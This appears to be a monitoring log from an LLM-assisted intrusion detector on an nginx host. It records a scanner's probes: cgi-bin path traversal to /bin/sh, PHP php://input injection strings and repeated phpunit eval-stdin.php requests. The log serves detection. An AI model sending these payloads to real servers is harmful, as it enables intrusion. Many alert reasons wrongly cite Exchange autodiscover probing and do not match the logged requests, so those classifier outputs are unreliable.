llm_errors=3 learned=4 Mar 20 13:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:34:01.954604 [observer] 
Patterns: hash=5414 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256 Mar 20 13:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:34:31.935099 [observer] Pipeline: processed=5674 pattern_hits=5418 llm_calls=256 llm_errors=3 learned=4 Mar 20 13:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:34:31.935124 [observer] Patterns: hash=5418 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256 Mar 20 13:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:35:01.951435 [observer] Pipeline: processed=5677 pattern_hits=5420 llm_calls=257 llm_errors=3 learned=4 Mar 20 13:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:35:01.951467 [observer] Patterns: hash=5420 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=257 Mar 20 13:35:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:35:07.669295 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.80 action=allow pattern_type=prefix Mar 20 13:35:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:35:07.669351 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern Mar 20 13:35:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:35:13.524349 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=contains Mar 20 13:35:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:35:13.524426 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern Mar 20 13:35:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:35:17.693112 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.70 action=allow pattern_type=prefix Mar 20 13:35:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:35:17.693147 [analyzer] Confidence 0.70 too low for pattern learning (need 0.85+) Mar 20 13:35:31 ip-172-26-12-110 
observer[1565011]: 2026/03/20 13:35:31.938319 [observer] Pipeline: processed=5683 pattern_hits=5424 llm_calls=259 llm_errors=3 learned=4 Mar 20 13:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:35:31.938348 [observer] Patterns: hash=5424 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259 Mar 20 13:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:36:01.953070 [observer] Pipeline: processed=5685 pattern_hits=5426 llm_calls=259 llm_errors=3 learned=4 Mar 20 13:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:36:01.953094 [observer] Patterns: hash=5426 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259 Mar 20 13:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:36:31.935643 [observer] Pipeline: processed=5689 pattern_hits=5430 llm_calls=259 llm_errors=3 learned=4 Mar 20 13:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:36:31.935668 [observer] Patterns: hash=5430 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259 Mar 20 13:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:37:01.963033 [observer] Pipeline: processed=5693 pattern_hits=5434 llm_calls=259 llm_errors=3 learned=4 Mar 20 13:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:37:01.963066 [observer] Patterns: hash=5434 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259 Mar 20 13:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:37:31.953940 [observer] Pipeline: processed=5695 pattern_hits=5436 llm_calls=259 llm_errors=3 learned=4 Mar 20 13:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:37:31.953969 [observer] Patterns: hash=5436 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259 Mar 20 13:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:38:01.940877 [observer] Pipeline: processed=5699 pattern_hits=5440 llm_calls=259 llm_errors=3 learned=4 Mar 20 13:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:38:01.940910 [observer] Patterns: hash=5440 prefix=0 
regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259 Mar 20 13:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:38:31.951501 [observer] Pipeline: processed=5701 pattern_hits=5442 llm_calls=259 llm_errors=3 learned=4 Mar 20 13:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:38:31.951535 [observer] Patterns: hash=5442 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259 Mar 20 13:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:39:01.956845 [observer] Pipeline: processed=5705 pattern_hits=5446 llm_calls=259 llm_errors=3 learned=4 Mar 20 13:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:39:01.956876 [observer] Patterns: hash=5446 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259 Mar 20 13:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:39:31.946360 [observer] Pipeline: processed=5707 pattern_hits=5448 llm_calls=259 llm_errors=3 learned=4 Mar 20 13:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:39:31.946387 [observer] Patterns: hash=5448 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259 Mar 20 13:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:40:01.981360 [observer] Pipeline: processed=5711 pattern_hits=5452 llm_calls=259 llm_errors=3 learned=4 Mar 20 13:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:40:01.981390 [observer] Patterns: hash=5452 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259 Mar 20 13:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:40:31.936545 [observer] Pipeline: processed=5713 pattern_hits=5454 llm_calls=259 llm_errors=3 learned=4 Mar 20 13:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:40:31.936576 [observer] Patterns: hash=5454 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259 Mar 20 13:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:41:01.988359 [observer] Pipeline: processed=5715 pattern_hits=5456 llm_calls=259 llm_errors=3 learned=4 Mar 20 13:41:01 
ip-172-26-12-110 observer[1565011]: 2026/03/20 13:41:01.988583 [observer] Patterns: hash=5456 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259 Mar 20 13:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:41:31.935558 [observer] Pipeline: processed=5719 pattern_hits=5460 llm_calls=259 llm_errors=3 learned=4 Mar 20 13:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:41:31.935581 [observer] Patterns: hash=5460 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259 Mar 20 13:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:42:01.962326 [observer] Pipeline: processed=5723 pattern_hits=5464 llm_calls=259 llm_errors=3 learned=4 Mar 20 13:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:42:01.962365 [observer] Patterns: hash=5464 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259 Mar 20 13:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:42:31.939236 [observer] Pipeline: processed=5727 pattern_hits=5468 llm_calls=259 llm_errors=3 learned=4 Mar 20 13:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:42:31.939257 [observer] Patterns: hash=5468 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259 Mar 20 13:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:43:01.964837 [observer] Pipeline: processed=5729 pattern_hits=5470 llm_calls=259 llm_errors=3 learned=4 Mar 20 13:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:43:01.964870 [observer] Patterns: hash=5470 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259 Mar 20 13:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:43:31.936249 [observer] Pipeline: processed=5733 pattern_hits=5474 llm_calls=259 llm_errors=3 learned=4 Mar 20 13:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:43:31.936272 [observer] Patterns: hash=5474 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259 Mar 20 13:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:44:01.945566 [observer] 
Pipeline: processed=5735 pattern_hits=5476 llm_calls=259 llm_errors=3 learned=4 Mar 20 13:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:44:01.945627 [observer] Patterns: hash=5476 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259 Mar 20 13:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:44:31.944229 [observer] Pipeline: processed=5737 pattern_hits=5478 llm_calls=259 llm_errors=3 learned=4 Mar 20 13:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:44:31.944254 [observer] Patterns: hash=5478 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259 Mar 20 13:45:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:00.901697 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T13:45:00.901440304Z 101.36.107.228 - - [20/Mar/2026:13:45:00 +0000] "_" "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 150 "-" "-" "-" Mar 20 13:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:01.823575 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T13:45:01.823281976Z 101.36.107.228 - - [20/Mar/2026:13:45:01 +0000] "_" "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%... 
Mar 20 13:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:01.961035 [observer] Pipeline: processed=5743 pattern_hits=5484 llm_calls=259 llm_errors=3 learned=4 Mar 20 13:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:01.961069 [observer] Patterns: hash=5484 prefix=0 regex=0 contains=0 deny=24 alert=434 suppress=0 misses=259 Mar 20 13:45:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:08.359617 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 13:45:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:08.359665 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Log shows an nginx error about a missing file and a request containing php://input and allow_url_include indicators, which are common in attempted PHP code injection/path traversal attacks. Line=2026-03-20T13:45:02.296712396Z 2026/03/20 13:45:02 [error] 422#422: *750652 open() "/usr/share/nginx/default/hello.world" failed (2: No such file or directory), client: 101.36.107.228, server: _, requ... Mar 20 13:45:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:08.359801 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:02.296819336Z 101.36.107.228 - - [20/Mar/2026:13:45:02 +0000] "54.200.221.0" "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 2401 "-" ... 
Mar 20 13:45:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:15.004970 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.75 action=deny pattern_type= Mar 20 13:45:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:15.005018 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 405 on a POST with a suspicious query attempting PHP wrappers suggests an injection/exploitation attempt targeted at PHP config. Likely malicious probe. Line=2026-03-20T13:45:02.938086815Z 101.36.107.228 - - [20/Mar/2026:13:45:02 +0000] "54.200.221.0" "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 405 150 "-" "libredtail-... Mar 20 13:45:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:21.113082 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type= Mar 20 13:45:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:21.113123 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a likely PHPUnit path under nginx suggests probing for vulnerable PHP code paths. The file does not exist, but the pattern is a known reconnaissance/attack vector. Line=2026-03-20T13:45:03.387650047Z 2026/03/20 13:45:03 [error] 422#422: *750652 open() "/usr/share/nginx/default/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), ... Mar 20 13:45:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:21.113192 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). 
Line=2026-03-20T13:45:03.387770991Z 101.36.107.228 - - [20/Mar/2026:13:45:03 +0000] "54.200.221.0" "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:45:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:25.922440 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 13:45:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:25.922481 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=External client attempting to access a suspicious PHP unit file path (vendor/phpunit/phpunit/Util/PHP/eval-stdin.php) on an nginx server. This mirrors common probing for phpunit vulnerabilities. Line=2026-03-20T13:45:04.070038785Z 2026/03/20 13:45:04 [error] 422#422: *750652 open() "/usr/share/nginx/default/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), clie... Mar 20 13:45:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:25.922536 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). 
Line=2026-03-20T13:45:04.070241504Z 101.36.107.228 - - [20/Mar/2026:13:45:04 +0000] "54.200.221.0" "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:31.940620 [observer] Pipeline: processed=5751 pattern_hits=5487 llm_calls=264 llm_errors=3 learned=4 Mar 20 13:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:31.940647 [observer] Patterns: hash=5487 prefix=0 regex=0 contains=0 deny=27 alert=434 suppress=0 misses=264 Mar 20 13:45:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:32.278323 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type= Mar 20 13:45:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:32.278361 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to PHP Unit vendor path (eval-stdin.php) commonly used in exploit scans against phpunit; unusual path request indicating potential probe for RCE. Line=2026-03-20T13:45:04.654314901Z 2026/03/20 13:45:04 [error] 422#422: *750652 open() "/usr/share/nginx/default/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: ... Mar 20 13:45:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:32.278427 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). 
Line=2026-03-20T13:45:04.654503617Z 101.36.107.228 - - [20/Mar/2026:13:45:04 +0000] "54.200.221.0" "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:45:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:40.481228 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type= Mar 20 13:45:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:40.481269 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request attempting to access a phpunit evaluation script (eval-stdin.php) which is a common probe for RCE/PII via PHP unit; file not found but indicative of exploitation attempt. Line=2026-03-20T13:45:05.255143537Z 2026/03/20 13:45:05 [error] 422#422: *750652 open() "/usr/share/nginx/default/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.... Mar 20 13:45:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:40.481334 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). 
Line=2026-03-20T13:45:05.255196260Z 101.36.107.228 - - [20/Mar/2026:13:45:05 +0000] "54.200.221.0" "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:45:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:44.450115 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type= Mar 20 13:45:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:44.450152 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Accessing a phpunit license path under vendor suggests probing for phpunit in web root, a common web exploit pattern to locate vulnerable components. Line=2026-03-20T13:45:05.742950360Z 2026/03/20 13:45:05 [error] 422#422: *750652 open() "/usr/share/nginx/default/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), clien... Mar 20 13:45:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:44.450222 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). 
Line=2026-03-20T13:45:05.743087908Z 101.36.107.228 - - [20/Mar/2026:13:45:05 +0000] "54.200.221.0" "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:45:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:50.369607 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type= Mar 20 13:45:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:50.369642 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempted access to phpunit eval-stdin.php path which is a common probe for RCE/LFI or misconfiguration exposure Line=2026-03-20T13:45:06.539517606Z 2026/03/20 13:45:06 [error] 422#422: *750652 open() "/usr/share/nginx/default/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or direc... Mar 20 13:45:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:50.369696 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:06.539684100Z 101.36.107.228 - - [20/Mar/2026:13:45:06 +0000] "54.200.221.0" "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "... Mar 20 13:45:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:55.937395 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type= Mar 20 13:45:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:55.937437 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a phpunit file path via HTTP request; commonly probed for known PHP unit vulnerabilities. 
Line=2026-03-20T13:45:07.230858238Z 2026/03/20 13:45:07 [error] 422#422: *750652 open() "/usr/share/nginx/default/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client:... Mar 20 13:45:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:45:55.937549 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:07.230899189Z 101.36.107.228 - - [20/Mar/2026:13:45:07 +0000] "54.200.221.0" "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:46:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:00.758865 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.75 action=alert pattern_type= Mar 20 13:46:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:00.758905 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to phpunit path suggests probing for vulnerable phpunit files; could be reconnaissance or attempted exploit Line=2026-03-20T13:45:07.783722944Z 2026/03/20 13:45:07 [error] 422#422: *750652 open() "/usr/share/nginx/default/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101... Mar 20 13:46:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:00.758961 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). 
Line=2026-03-20T13:45:07.783844149Z 101.36.107.228 - - [20/Mar/2026:13:45:07 +0000] "54.200.221.0" "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:01.948645 [observer] Pipeline: processed=5763 pattern_hits=5493 llm_calls=270 llm_errors=3 learned=4 Mar 20 13:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:01.948680 [observer] Patterns: hash=5493 prefix=0 regex=0 contains=0 deny=33 alert=434 suppress=0 misses=270 Mar 20 13:46:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:07.942667 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.75 action=alert pattern_type= Mar 20 13:46:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:07.942706 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a phpunit path that is often targeted in automated scanning; file not found but indicates probing for PHPUnit related vectors. Line=2026-03-20T13:45:08.289746866Z 2026/03/20 13:45:08 [error] 422#422: *750652 open() "/usr/share/nginx/default/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.... Mar 20 13:46:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:07.942767 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). 
Line=2026-03-20T13:45:08.289855951Z 101.36.107.228 - - [20/Mar/2026:13:45:08 +0000] "54.200.221.0" "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:46:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:13.279014 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.80 action=deny pattern_type= Mar 20 13:46:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:13.279068 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request targets a known phpunit tooling path via /phpunit/Util/PHP/eval-stdin.php, which is a common probe for phpunit-related RCE exploits. Line=2026-03-20T13:45:08.923029557Z 2026/03/20 13:45:08 [error] 422#422: *750652 open() "/usr/share/nginx/default/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.... Mar 20 13:46:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:13.279122 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:08.923144637Z 101.36.107.228 - - [20/Mar/2026:13:45:08 +0000] "54.200.221.0" "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:46:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:18.057560 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 13:46:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:18.057602 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Error shows an access attempt to a phpunit php file path which is a common probe for PHP code execution or vulnerability scanning. 
The request failed with file not found, but this pattern is unusual and warrants monitoring. Line=2026-03-20T13:45:09.493365314Z 2026/03/20 13:45:09 [error] 422#422: *750652 open() "/usr/share/nginx/default/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), cli... Mar 20 13:46:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:18.057655 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T13:45:09.493520305Z 101.36.107.228 - - [20/Mar/2026:13:45:09 +0000] "54.200.221.0" "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-" Mar 20 13:46:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:23.520604 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 13:46:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:23.520645 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a phpunit file path (eval-stdin.php) typical of probe or exploit attempts against PHP frameworks. Line=2026-03-20T13:45:10.015000419Z 2026/03/20 13:45:10 [error] 422#422: *750652 open() "/usr/share/nginx/default/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client:... Mar 20 13:46:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:46:23.520711 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). 
